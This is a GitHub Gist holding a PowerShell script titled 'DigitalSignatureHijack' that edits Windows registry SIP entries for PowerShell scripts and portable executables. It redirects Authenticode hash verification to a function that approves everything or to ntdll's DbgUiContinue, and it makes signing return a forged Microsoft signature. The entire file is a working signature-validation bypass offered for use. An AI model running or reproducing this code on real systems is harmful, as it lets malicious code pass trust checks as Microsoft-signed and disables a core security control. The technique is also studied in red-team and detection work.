Last active
October 2, 2022 21:31
-
-
Save netbiosX/fe5b13b4cc59f9a944fe40944920d07c to your computer and use it in GitHub Desktop.
Hijack Digital Signatures and Bypass Authenticode Hash Validation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| DigitalSignatureHijack v1.0 | |
| License: GPLv3 | |
| Author: @netbiosX | |
| #> | |
| # Validate Digital Signature for PowerShell Scripts | |
| function ValidateSignaturePS | |
| { | |
| $ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData' | |
| # PowerShell SIP Guid | |
| $PSIPGuid = '{603BCC1F-4B59-4E08-B724-D2C6297EF351}' | |
| $PSSignatureValidation = Get-Item -Path "$ValidateHashFunc\$PSIPGuid\" | |
| $NewDll = 'C:\Users\User\Desktop\Signature Signing\Binaries\MySIP.dll' | |
| $NewFuncName = 'AutoApproveHash' | |
| $PSSignatureValidation | Set-ItemProperty -Name Dll -Value $NewDll | |
| $PSSignatureValidation | Set-ItemProperty -Name FuncName -Value $NewFuncName | |
| } | |
| # Validate Digital Signature for Portable Executables | |
| function ValidateSignaturePE | |
| { | |
| $ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData' | |
| # PE SIP Guid | |
| $PESIPGuid = '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}' | |
| $PESignatureValidation = Get-Item -Path "$ValidateHashFunc\$PESIPGuid\" | |
| $NewDll = 'C:\Windows\System32\ntdll.dll' | |
| $NewFuncName = 'DbgUiContinue' | |
| $PESignatureValidation | Set-ItemProperty -Name Dll -Value $NewDll | |
| $PESignatureValidation | Set-ItemProperty -Name FuncName -Value $NewFuncName | |
| } | |
| # Sign PowerShell Scripts with a Microsoft Certificate | |
| function SignPS | |
| { | |
| $GetCertFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg' | |
| # PowerShell SIP Guid | |
| $PSIPGuid = '{603BCC1F-4B59-4E08-B724-D2C6297EF351}' | |
| $PEGetMSCert = Get-Item -Path "$GetCertFunc\$PSIPGuid\" | |
| $NewDll = 'C:\Users\User\Desktop\Signature Signing\Binaries\MySIP.dll' | |
| $NewFuncName = 'GetLegitMSSignature' | |
| $PEGetMSCert | Set-ItemProperty -Name Dll -Value $NewDll | |
| $PEGetMSCert | Set-ItemProperty -Name FuncName -Value $NewFuncName | |
| } | |
| # Sign Portable Executables with a Microsoft Certificate | |
| function SignExe | |
| { | |
| $GetCertFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg' | |
| # PE SIP Guid | |
| $PESIPGuid = '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}' | |
| $PEGetMSCert = Get-Item -Path "$GetCertFunc\$PESIPGuid\" | |
| $NewDll = 'C:\Users\User\Desktop\Signature Signing\Binaries\MySIP.dll' | |
| $NewFuncName = 'GetLegitMSSignature' | |
| $PEGetMSCert | Set-ItemProperty -Name Dll -Value $NewDll | |
| $PEGetMSCert | Set-ItemProperty -Name FuncName -Value $NewFuncName | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment